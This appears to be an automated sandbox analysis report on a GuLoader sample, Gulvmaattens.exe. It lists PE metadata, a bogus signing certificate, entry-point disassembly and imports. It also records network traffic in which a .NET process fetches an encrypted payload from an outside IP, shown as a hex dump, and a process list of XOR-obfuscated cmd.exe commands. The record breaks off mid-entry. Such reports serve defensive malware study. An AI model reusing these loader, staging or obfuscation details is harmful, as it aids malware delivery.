                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...@.$_.................h.........
                          Icon Hash:93b3b3bbb3936825
                          Entrypoint:0x4034c5
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5F24D740 [Sat Aug 1 02:45:20 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                          Signature Valid:false
                          Signature Issuer:CN="Tooter Shampooer Kettle ", OU="annali Perdurableness ", E=Koulibiaca@Hulkortsskrivern.Su, O=Ogenesis, L=Orange, S=Massachusetts, C=US
                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                          Error Number:-2146762487
                          Not Before, Not After
                          • 08/08/2022 14:55:24 07/08/2025 14:55:24
                          Subject Chain
                          • CN="Tooter Shampooer Kettle ", OU="annali Perdurableness ", E=Koulibiaca@Hulkortsskrivern.Su, O=Ogenesis, L=Orange, S=Massachusetts, C=US
                          Version:3
                          Thumbprint MD5:76ED57997AF67C2107B7010C8833ADEF
                          Thumbprint SHA-1:557BE5598D07AF389C57DC1E4C9826CA448FDF22
                          Thumbprint SHA-256:2A16BA9FDD28325FD15AAD479267E2B416F665403F765E104110880CBDB9D0AB
                          Serial:201170BBA5A4E42C
                          Instruction
                          sub esp, 000002D4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [esp+14h], ebx
                          mov dword ptr [esp+10h], 0040A2E0h
                          mov dword ptr [esp+1Ch], ebx
                          call dword ptr [004080CCh]
                          call dword ptr [004080D0h]
                          and eax, BFFFFFFFh
                          cmp ax, 00000006h
                          mov dword ptr [00434F0Ch], eax
                          je 00007FB4AC414673h
                          push ebx
                          call 00007FB4AC417961h
                          cmp eax, ebx
                          je 00007FB4AC414669h
                          push 00000C00h
                          call eax
                          mov esi, 004082B0h
                          push esi
                          call 00007FB4AC4178DBh
                          push esi
                          call dword ptr [00408154h]
                          lea esi, dword ptr [esi+eax+01h]
                          cmp byte ptr [esi], 00000000h
                          jne 00007FB4AC41464Ch
                          push 0000000Bh
                          call 00007FB4AC417934h
                          push 00000009h
                          call 00007FB4AC41792Dh
                          push 00000007h
                          mov dword ptr [00434F04h], eax
                          call 00007FB4AC417921h
                          cmp eax, ebx
                          je 00007FB4AC414671h
                          push 0000001Eh
                          call eax
                          test eax, eax
                          je 00007FB4AC414669h
                          or byte ptr [00434F0Fh], 00000040h
                          push ebp
                          call dword ptr [00408038h]
                          push ebx
                          call dword ptr [00408298h]
                          mov dword ptr [00434FD8h], eax
                          push ebx
                          lea eax, dword ptr [esp+34h]
                          push 000002B4h
                          push eax
                          push ebx
                          push 0042B228h
                          call dword ptr [0040818Ch]
                          push 0040A2C8h
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x9bd0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x51bd00x1f70.ndata
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x67930x6800False0.6720628004807693data6.495258513279076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x14a40x1600False0.4385653409090909data5.01371465125838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x2b0180x600False0.5240885416666666data4.155579717739458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata0x360000x290000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x5f0000x9bd00x9c00False0.2835536858974359data5.009149631581678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x5f3100x3228dBase IV DBT of \200.DBF, blocks size 0, block length 12800, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x625380x1ca8dataEnglishUnited States
                          RT_ICON0x641e00x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 0, next used block 67108864EnglishUnited States
                          RT_ICON0x658080xea8dataEnglishUnited States
                          RT_ICON0x666b00xca8dataEnglishUnited States
                          RT_ICON0x673580x8a8dataEnglishUnited States
                          RT_ICON0x67c000x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x681680x368GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_DIALOG0x684d00x100dataEnglishUnited States
                          RT_DIALOG0x685d00x11cdataEnglishUnited States
                          RT_DIALOG0x686f00xc4dataEnglishUnited States
                          RT_DIALOG0x687b80x60dataEnglishUnited States
                          RT_GROUP_ICON0x688180x76dataEnglishUnited States
                          RT_MANIFEST0x688900x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampSource PortDest PortSource IPDest IP
                          Aug 8, 2022 20:26:53.555304050 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.574580908 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.574939966 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.575584888 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.599692106 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.599756002 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.599805117 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.599864006 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.599899054 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.599950075 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.600079060 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619232893 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619335890 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619404078 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619442940 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619452953 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619503021 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619527102 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619577885 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619626045 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619632959 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619673014 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.619673967 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619786978 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.619859934 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641057014 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641160965 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641239882 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641266108 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641330004 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641377926 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641422033 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641427994 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641462088 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641505003 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641552925 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641571999 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641598940 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641612053 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641645908 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641691923 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641695023 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641738892 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641757965 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641786098 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641829967 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641833067 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641901970 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.641973019 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.641984940 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.642019033 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.642100096 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.642108917 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661019087 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661082983 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661130905 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661176920 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661197901 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661222935 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661246061 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661333084 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661375046 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661422968 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661470890 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661477089 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661526918 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661575079 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661581993 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661621094 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661622047 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661667109 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661712885 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661741972 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661761999 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661782026 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661830902 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661849976 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661880016 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661926985 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661926985 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.661973953 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.661989927 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662019968 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662065983 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662106991 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662111998 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662158966 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662161112 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662205935 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662224054 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662252903 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662301064 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662313938 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662348032 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662395000 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662415028 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662441969 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662486076 CEST4979580192.168.11.20212.192.246.226
                          Aug 8, 2022 20:26:53.662529945 CEST8049795212.192.246.226192.168.11.20
                          Aug 8, 2022 20:26:53.662549973 CEST4979580192.168.11.20212.192.246.226
                          • 212.192.246.226
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.11.2049795212.192.246.22680C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          TimestampkBytes transferredDirectionData
                          Aug 8, 2022 20:26:53.575584888 CEST6679OUTGET /jLIEsqMZom33.asd HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: 212.192.246.226
                          Cache-Control: no-cache
                          Aug 8, 2022 20:26:53.599692106 CEST6680INHTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Last-Modified: Mon, 08 Aug 2022 14:57:31 GMT
                          Accept-Ranges: bytes
                          ETag: "be9ac2f37abd81:0"
                          Server: Microsoft-IIS/8.5
                          Date: Mon, 08 Aug 2022 18:26:53 GMT
                          Content-Length: 219200
                          Data Raw: 6d 14 a7 82 6c 84 2f cf a4 ad af f4 50 7a 66 28 03 0c 2f f7 29 de d9 d6 b4 e1 65 d9 ac a9 b3 86 1c cc ea c1 80 89 93 70 ef cc 98 a2 8b c5 8b 0f f9 f1 aa 1b 50 55 78 24 ea e1 b5 98 1a 23 70 a2 ed 15 86 aa cf 70 36 76 98 31 48 a9 a8 e4 5a 1b 33 a9 bb b5 77 d4 4b 24 8e 2a 2e e3 75 1f 95 17 0b f3 35 c4 f4 8d 9d 7f 78 2b 20 04 e7 c3 9d 75 41 00 cf 53 dc d7 72 48 1e ed 3d 97 51 d1 c2 2e 6d cf fa f3 9f 64 80 3a 84 96 f1 cf 08 4e be 73 3e c8 85 6d 1f 12 05 b3 06 dc 61 52 c6 17 8c a1 2a 58 99 b5 45 78 d3 13 52 71 72 47 62 78 9d 24 20 d3 cb c2 4d a7 c1 90 a0 ad f6 b5 7e 5c 3e f4 1a d4 07 f3 12 bc 5c 31 2a 53 e0 65 51 4e cb fe 2f ff 69 60 05 89 cd 88 60 a5 5a 55 70 26 ee 2f f4 72 b2 bb d8 10 71 42 53 a5 4b f0 87 90 2b e6 93 02 26 67 71 c9 7a f1 65 08 8d ef b2 27 50 73 7d 5f ed ed 1d 65 92 b5 51 ad 6e 56 a3 03 df 90 c3 8c 5f 2e 20 9d a7 8b f7 61 bd 82 69 18 c8 fb a9 cc 4c dc b2 0f a2 cc 5e f9 0c ca 02 53 d7 3d 87 c5 f1 ab e6 c5 2a 60 5e 9c 16 e8 9b 4b e2 d9 f3 e9 a4 b1 dc e8 13 6a b8 d1 c3 47 92 88 f9 e9 4d 72 8f 60 56 09 55 30 f4 1a 14 91 e2 87 cd e6 d2 c8 c4 50 7e fa 17 bd 45 da b4 5c a5 54 1e db 74 5d f8 2a cc 6f bb fa 3d 56 58 90 72 54 4a 85 6a 78 67 38 56 6c fd 8c 55 85 de 56 6c 1b d6 18 fc dd 54 71 b5 09 56 58 78 8f 4d 17 12 5d b5 67 1c 55 87 48 80 da bf 09 1b d5 70 ee 54 ea 36 25 27 2c ed 4d 77 35 3f 9e 5b e5 21 84 b0 b0 a9 77 03 de ea a4 a1 84 79 1e 03 97 97 35 ef 71 9c 5d 7a c9 58 47 0b 8a 0f a2 b7 aa 87 fe b9 82 28 a3 32 16 de 2f 39 f8 6e a4 a0 c4 eb 38 20 d9 85 f5 98 26 0f c5 4e fa 20 1b 06 5c fc 74 d5 5f b5 c1 c2 6f 63 5b fe a5 58 20 52 f7 82 01 59 2b 9a 42 35 4e d3 d5 25 89 d3 86 e4 5c dd d9 a5 4d 98 34 39 9a 42 85 a2 b2 38 54 35 98 44 e1 a9 1f 3a 04 57 d0 54 1f 62 7d 4c 9d 72 34 d3 35 7b ef 06 d0 c4 ee 27 a6 ed 5a f1 10 4f cd 6b 9a a7 f4 be 5f eb 0c 0d e6 63 89 13 9e 79 0e db 25 1a 36 f2 d9 4e 43 e5 f5 a9 6a 4d d0 7e 34 c5 75 ff 39 cc c8 5f b9 d3 e3 07 c2 50 a3 af 1c c3 f2 bd 30 0c 80 33 5e 11 ac 28 be 9e ac fc b7 f4 b4 f2 b4 ed 9f c8 65 8e 2e e4 93 63 71 59 a7 50 d2 6e 09 3f 55 8f fd 56 a6 77 67 7b 36 fa 1d 2b c2 c7 54 ad 85 d2 42 64 6e 2c 3e 78 fd 78 7b 52 2b 3c 8f 0d cf 75 1c da f5 f6 76 ff 21 90 64 8b bb a7 34 bf 39 19 9d 73 9b 21 bd ee cd c9 6f 97 8e 61 b9 0c 57 d2 cf 59 68 25 c6 c5 01 c6 d7 cf 14 7d 4f 2e c0 e6 f1 3d f3 4f de c5 17 fb a3 3f d2 ca 0e 87 de f0 4f 36 3e 13 01 a0 30 89 99 1f 99 f1 d0 ff f2 99 dd 80 8f 05 3c 36 50 3f 14 0d 0f 77 57 7e 52 ef 0e 00 2b 6d ef 4a 7e 73 16 db 53 58 7e ac 37 d8 7b 9e 2c 6f 96 c7 f1 a7 fa 50 c2 0a a5 4b e4 86 94 57 69 8d 13 10 27 33 50 76 a9 bb 08 a6 96 f2 61 69 52 52 59 a5 ec e2 5f 80 a2 23 43 0e bc 24 5e 4e 3a a8 e7 72 1d 95 e2 32 48 a9 53 74 56 1b 8b a3 91 a6 47 d6 4b 08 ce 2a 2e e7 75 1f 84 01 00 d8 2e c4 f3 9a 63 7e 54 29 38 0f e7 c4 8b 8b 40 2c cd 44 d7 d7 75 50 e0 ec 11 95 fa d3 e9 cd 1d d4 40 fd 9b bf 84 f7 a5 24 da 90 f5 6d ea 35 57 bb a5 18 6d 7d 73 d7 6c 9a 5a 31 a0 6e 1c cf 72 7a e3 db 65 0d b0 83 73 34 1e 70 2d 37 c9 1c b3 bd 83 a5 48 a8 e7 79 86 ae de a4 7e 5c 34 dc 58 91 07 f9 74 bd 5f 22 6e 5d 07 2c 51 4e cb f8 2f ff 78 76 ee a2 d4 89 6c b3 af 54 5c 6a f5 24 f4 7d a4 45 d9 3c 73 55 d6 c8 4f e8 79 b1 07 e4 b8 00 0d 84 73 e1 29 f1 65 22 a7 fc 82 27 50 5f 79 5f ed ea 1d 65 83 a3 5e 86 75 56 a4 14 21 91 ef 4e 44 25 20 98 b1 75 f6 4d bf 95 60 18 8f 66 57 cd 70 de 99 1d 89 2f
                          Data Ascii: ml/Pzf(/)epPUx$#pp6v1HZ3wK$*.u5x+ uASrH=Q.md:Ns>maR*XExRqrGbx$ M~\>\1*SeQN/i``ZUp&/rqBSK+&gqze'Ps}_eQnV_. aiL^S=*`^KjGMr`VU0P~E\Tt]*o=VXrTJjxg8VlUVlTqVXxM]gUHpT6%',Mw5?[!wy5q]zXG(2/9n8 &N \t_oc[X RY+B5N%\M49B8T5D:WTb}Lr45{'ZOk_cy%6NCjM~4u9_P03^(e.cqYPn?UVwg{6+TBdn,>xx{R+<uv!d49s!oaWYh%}O.=O?O6>0<6P?wW~R+mJ~sSX~7{,oPKWi'3PvaiRRY_#C$^N:r2HStVGK*.u.c~T)8@,DuP@$m5Wm}slZ1nrzes4p-7Hy~\4Xt_"n],QN/xvlT\j$}E<sUOys)e"'P_y_e^uV!ND% uM`fWp/


                          Click to jump to process

                          Target ID:1
                          Start time:20:25:44
                          Start date:08/08/2022
                          Path:C:\Users\user\Desktop\Gulvmaattens.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x400000
                          File size:342848 bytes
                          MD5 hash:AFA8D5C2F8F14ED458EA6D8547FE57A8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.51584834701.0000000002AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:3
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x78^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:4
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:5
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x76^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:6
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:7
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x61^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:8
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:9
                          Start time:20:25:45
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x7D^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:10
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:11
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x76^51"
                          Imagebase:
